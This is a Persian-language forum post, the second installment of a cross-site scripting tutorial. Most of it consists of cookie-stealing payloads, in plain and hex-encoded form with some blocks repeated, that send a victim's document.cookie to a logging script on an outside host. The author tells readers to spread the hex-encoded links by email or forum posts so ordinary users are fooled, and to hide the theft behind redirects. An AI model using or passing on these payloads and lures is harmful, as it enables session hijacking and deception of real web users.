Meteor
کاربر تازه وارد
- تاریخ عضویت
- 31 می 2004
- نوشتهها
- 124
- لایکها
- 1
- سن
- 44
سلام
با اینکه مقاله هنوز خواننده جذب نکرده و پاسخ زیادی نداشته اما مابقی مطلبم را می نویسم .
در قسمت قبل نوشتم که نحوه کار XSS به چه شکل هست و شروع کردم به کار حالا مابقی ماجرا
قدم دوم تست کردن بود که توضیح دادم .
و اما مثال هایی از زدیدن کوکی توسط جاوا اسکریپت
ASCII Usage:http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
Hex Usage:http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
نکته : این رکوئست(درخواست) اول در حالت اسکی نوشته شده و بعد به منظور کپی و پیست کردنش رفته تو مد هگز
1. "><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
3. ><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
3. ><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e
اینها چند مثال شیطانی بود که از جاوا اسکریپت استفاده میکرد.این جاوا ها کوکی های کاربر را جمع میکنن و بعد درخواست یا همون رکوئست خودمون را میفرستن به اون سایت که بالا اسمش هست . حالا اون اسکریپتی که روی سایت قرار داره همه این اطلاعات رو ذخیره میکنه خلاصه القصه این کارا انجام میشه :
My cookie = user=zeno; id=021
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
بعد درخواست را که مثل این یکی هست را میفرسته توی سایت طرف
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space
اما این یکی از راه هایی هست که ازش استفاده میشه تا کوکی های کاربر را جمع کنن . یه مشت از کوکی هایی که توسط عموم جمع شده را توی این آدرس میتونید پیدا کنید .
http://www.cgisecurity.com/articles/cookie-theft.log یه 14 مگی هست
حالا قدم سوم .XSS Execution
حالا این آدرس قر و قاطی را که نوشتین را یه جوری به ملت قالب کنید یا با ایمیل یا همینجا بذارینش تو انجمن بعد هم کلی روش تبلیغ کنین تا ملت بیان و روی اون لینک کذایی بکلیکن . اما مطمئن بشین که وقتی دارین مذارینش رو سایت حتما تبدیلش کنین به هگز . آخه اگه کد را همینجوری بذارین رو سایت خیلی ها راحت میفهمن چه خبره ولی وقتی تبدیلش کنید به هگز اونوقت مردم عادی نمیگیرن که جریان چیه و راحت گول می خورن .
توی مثال بالا من فقط کاربر را فوروارد کردم به cookie.cgi یک حمله گر می تونه با صرف وقت بیشتری چند تا ریدایرکت را بذاره تا بتونه کوکی را بدزده و بعد هم بذارتشون یا همون ریدایرکت خودمون ریدایرکتشون کنه یه جای باحال تا طرف کلی کیف کنه و نفهمه که کوکیش دزدیه شده . بعضی وقت ها این چیزا رو یه جوری میذارن توی ایمیل که به محض باز شدن ایمیل اجرا میشه و مابقی ماجرا خلاصه اینکه حواستون باشه که ایمیل های العی را باز نکنین و هر لینکی را کلیک نکنید . مخصوصا که به هگز تبدیل شده باشن . بعضی از سایت های بزرگ مثل HotMail اجازه اجرا به اسکریپت های داخل ملحقات را میدن اما یه چند تایی هم فیلتر دارن که جلوی دزدین کوکی ها رو میگیره .
قدم چهارم با این اطلاعات چه کنیم ؟ میمونه واسه برنامه بعد . اگر دوست داشتین ادامه بدم باید ریپلای بدین .